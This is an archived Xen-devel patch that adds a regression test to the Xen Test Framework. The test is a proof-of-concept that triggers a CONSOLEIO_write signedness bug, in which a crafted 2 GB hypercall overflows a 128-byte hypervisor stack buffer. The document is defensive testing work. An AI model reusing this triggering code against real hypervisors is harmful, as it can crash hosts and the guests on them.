From patchwork Fri Nov 29 14:35:09 2019 Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit X-Patchwork-Submitter: Andrew Cooper X-Patchwork-Id: 11267215 Return-Path: Received: from mail.kernel.org (pdx-korg-mail-1.web.codeaurora.org [172.30.200.123]) by pdx-korg-patchwork-2.web.codeaurora.org (Postfix) with ESMTP id E5BF815AB for ; Fri, 29 Nov 2019 14:36:12 +0000 (UTC) Received: from lists.xenproject.org (lists.xenproject.org [192.237.175.120]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (No client certificate requested) by mail.kernel.org (Postfix) with ESMTPS id C260F21736 for ; Fri, 29 Nov 2019 14:36:12 +0000 (UTC) Authentication-Results: mail.kernel.org; dkim=fail reason="signature verification failed" (1024-bit key) header.d=citrix.com header.i=@citrix.com header.b="dgLmUJRH" DMARC-Filter: OpenDMARC Filter v1.3.2 mail.kernel.org C260F21736 Authentication-Results: mail.kernel.org; dmarc=fail (p=none dis=none) header.from=citrix.com Authentication-Results: mail.kernel.org; spf=none smtp.mailfrom=xen-devel-bounces@lists.xenproject.org Received: from localhost ([127.0.0.1] helo=lists.xenproject.org) by lists.xenproject.org with esmtp (Exim 4.89) (envelope-from ) id 1iahMa-0002pC-Tg; Fri, 29 Nov 2019 14:35:16 +0000 Received: from us1-rack-iad1.inumbo.com ([172.99.69.81]) by lists.xenproject.org with esmtp (Exim 4.89) (envelope-from ) id 1iahMZ-0002p2-Gi for xen-devel@lists.xenproject.org; Fri, 29 Nov 2019 14:35:15 +0000 X-Inumbo-ID: 74d5b59c-12b5-11ea-83b8-bc764e2007e4 Received: from esa5.hc3370-68.iphmx.com (unknown [216.71.155.168]) by us1-rack-iad1.inumbo.com (Halon) with ESMTPS id 74d5b59c-12b5-11ea-83b8-bc764e2007e4; Fri, 29 Nov 2019 14:35:15 +0000 (UTC) DKIM-Signature: v=1; a=rsa-sha256; c=simple/simple; d=citrix.com; s=securemail; t=1575038114; h=from:to:cc:subject:date:message-id:in-reply-to: references:mime-version; bh=RiH7jnaB3EiOtyjYOGj/CNHCoyixO+9rlHBMwVdVOOE=; b=dgLmUJRH4F3pSnsswoYO2+/fB+e0I604PZ7jM6xe5LtA8oK5DcRJoDDL oNNrE32vUNbASJ9wBeRZ09d6q2YYfgjFestJlZLV1KrKc/BlsooM1MxE5 LX0Sdo0uH9A/EIzMMHM22oT9If1z9qDZQ+TzrBsjOFrbZBnT5tLqWlNsH U=; Authentication-Results: esa5.hc3370-68.iphmx.com; dkim=none (message not signed) header.i=none; spf=None smtp.pra=andrew.cooper3@citrix.com; spf=Pass smtp.mailfrom=Andrew.Cooper3@citrix.com; spf=None smtp.helo=postmaster@mail.citrix.com Received-SPF: None (esa5.hc3370-68.iphmx.com: no sender authenticity information available from domain of andrew.cooper3@citrix.com) identity=pra; client-ip=162.221.158.21; receiver=esa5.hc3370-68.iphmx.com; envelope-from="Andrew.Cooper3@citrix.com"; x-sender="andrew.cooper3@citrix.com"; x-conformance=sidf_compatible Received-SPF: Pass (esa5.hc3370-68.iphmx.com: domain of Andrew.Cooper3@citrix.com designates 162.221.158.21 as permitted sender) identity=mailfrom; client-ip=162.221.158.21; receiver=esa5.hc3370-68.iphmx.com; envelope-from="Andrew.Cooper3@citrix.com"; x-sender="Andrew.Cooper3@citrix.com"; x-conformance=sidf_compatible; x-record-type="v=spf1"; x-record-text="v=spf1 ip4:209.167.231.154 ip4:178.63.86.133 ip4:195.66.111.40/30 ip4:85.115.9.32/28 ip4:199.102.83.4 ip4:192.28.146.160 ip4:192.28.146.107 ip4:216.52.6.88 ip4:216.52.6.188 ip4:162.221.158.21 ip4:162.221.156.83 ip4:168.245.78.127 ~all" Received-SPF: None (esa5.hc3370-68.iphmx.com: no sender authenticity information available from domain of postmaster@mail.citrix.com) identity=helo; client-ip=162.221.158.21; receiver=esa5.hc3370-68.iphmx.com; envelope-from="Andrew.Cooper3@citrix.com"; x-sender="postmaster@mail.citrix.com"; x-conformance=sidf_compatible IronPort-SDR: 077PrDM3EXaVUUZbs0gmRCV4gMyugHQY8r7rRiV7LWIT+5c3slZAPWJdolZzz2vkDLHX7bGxbc H6T8Q6DubzuT0tUEGV2eZboL6zqEAjPV8fcc6hrcWU4qM2M9qkzWP8uPe2a+o3Hhby+WJ101bK qMLMBjI08BsRSv/scliVUKxc95ePOVixyMx/WuJr2L0WUmEVVeEno45JhuWNvWLGfsDf0Gn+Tt 3VKD4XzCmkP/bhseM6WpMmRDs3i4dBve67nl/OHnoIc4QHAbbTwJlk2VJvk8eCr2F15O/nxLzE m0c= X-SBRS: 2.7 X-MesageID: 9344533 X-Ironport-Server: esa5.hc3370-68.iphmx.com X-Remote-IP: 162.221.158.21 X-Policy: $RELAYED X-IronPort-AV: E=Sophos;i="5.69,257,1571716800"; d="scan'208";a="9344533" From: Andrew Cooper To: Date: Fri, 29 Nov 2019 14:35:09 +0000 Message-ID: <20191129143509.26528-1-andrew.cooper3@citrix.com> X-Mailer: git-send-email 2.11.0 In-Reply-To: <5766dd2b-2aa7-bafe-56ad-3ea33ddf4591@suse.com> References: <5766dd2b-2aa7-bafe-56ad-3ea33ddf4591@suse.com> MIME-Version: 1.0 Subject: [Xen-devel] [PATCH XTF] CONSOLEIO_write stack overflow PoC X-BeenThere: xen-devel@lists.xenproject.org X-Mailman-Version: 2.1.23 Precedence: list List-Id: Xen developer discussion List-Unsubscribe: , List-Post: List-Help: List-Subscribe: , Cc: Andrew Cooper Errors-To: xen-devel-bounces@lists.xenproject.org Sender: "Xen-devel" Classify it as an XSA test (which arguably ought to be named 'security'), despite no XSA being issues. Signed-off-by: Andrew Cooper Reviewed-by: Jan Beulich --- docs/all-tests.dox | 2 ++ tests/xsa-consoleio-write/Makefile | 9 +++++ tests/xsa-consoleio-write/main.c | 69 ++++++++++++++++++++++++++++++++++++++ 3 files changed, 80 insertions(+) create mode 100644 tests/xsa-consoleio-write/Makefile create mode 100644 tests/xsa-consoleio-write/main.c diff --git a/docs/all-tests.dox b/docs/all-tests.dox index 50429127..bcf9b7ed 100644 --- a/docs/all-tests.dox +++ b/docs/all-tests.dox @@ -143,6 +143,8 @@ XSA-293 - See @ref test-pv-fsgsbase. @subpage test-xsa-298 - missing descriptor table limit checking in x86 PV emulation. +@subpage test-xsa-consoleio-write - CONSOLEIO_write stack overflow + @section index-utility Utilities diff --git a/tests/xsa-consoleio-write/Makefile b/tests/xsa-consoleio-write/Makefile new file mode 100644 index 00000000..d189b4de --- /dev/null +++ b/tests/xsa-consoleio-write/Makefile @@ -0,0 +1,9 @@ +include $(ROOT)/build/common.mk + +NAME := xsa-consoleio-write +CATEGORY := xsa +TEST-ENVS := hvm32pae + +obj-perenv += main.o + +include $(ROOT)/build/gen.mk diff --git a/tests/xsa-consoleio-write/main.c b/tests/xsa-consoleio-write/main.c new file mode 100644 index 00000000..f10a6256 --- /dev/null +++ b/tests/xsa-consoleio-write/main.c @@ -0,0 +1,69 @@ +/** + * @file tests/xsa-consoleio-write/main.c + * @ref test-xsa-consoleio-write + * + * This issue was discovered before it made it into any released version of + * Xen. Therefore, no XSA or CVE was issued. + * + * A bugfix in Xen 4.13 altered CONSOLEIO_write to tolerate passing NUL + * characters intact, as this is a requirement for various TTY setups. + * + * A signed-ness issue with the length calculation lead to a case where Xen + * will copy between 2 and 4G of guest provided data into a 128 byte object on + * the stack. + * + * @see tests/xsa-consoleio-write/main.c + */ +#include + +const char test_title[] = "CONSOLEIO_write stack overflow PoC"; + +uint8_t zero_page[PAGE_SIZE] __page_aligned_bss; + +/* Have the assembler build an L1/L2 pair mapping zero_page[] many times. */ +asm (".section \".data.page_aligned\", \"aw\";" + ".align 4096;" + + "l1t:" + ".rept 512;" + ".long zero_page + "STR(PF_SYM(AD, P))", 0;" + ".endr;" + ".size l1t, . - l1t;" + ".type l1t, @object;" + + "l2t:" + ".rept 512;" + ".long l1t + "STR(PF_SYM(AD, P))", 0;" + ".endr;" + ".size l2t, . - l2t;" + ".type l2t, @object;" + + ".previous;" + ); +extern intpte_t l2t[512]; + +void test_main(void) +{ + /* Map 2G worth of zero_page[] starting from 1G... */ + pae_l3_identmap[1] = pae_l3_identmap[2] = pte_from_virt(l2t, PF_SYM(AD, P)); + + /* + * ... , write those zeros with a length possible to be confused by a + * signed bounds check... + */ + hypercall_console_write(_p(GB(1)), 0x80000000); + + /* ... and if Xen is still alive, it didn't trample over its own stack. */ + + xtf_success("Success: Not vulnerable to CONSOLEIO_write stack overflow\n"); +} + +/* + * Local variables: + * mode: C + * c-file-style: "BSD" + * c-basic-offset: 4 + * tab-width: 4 + * indent-tabs-mode: nil + * End: + */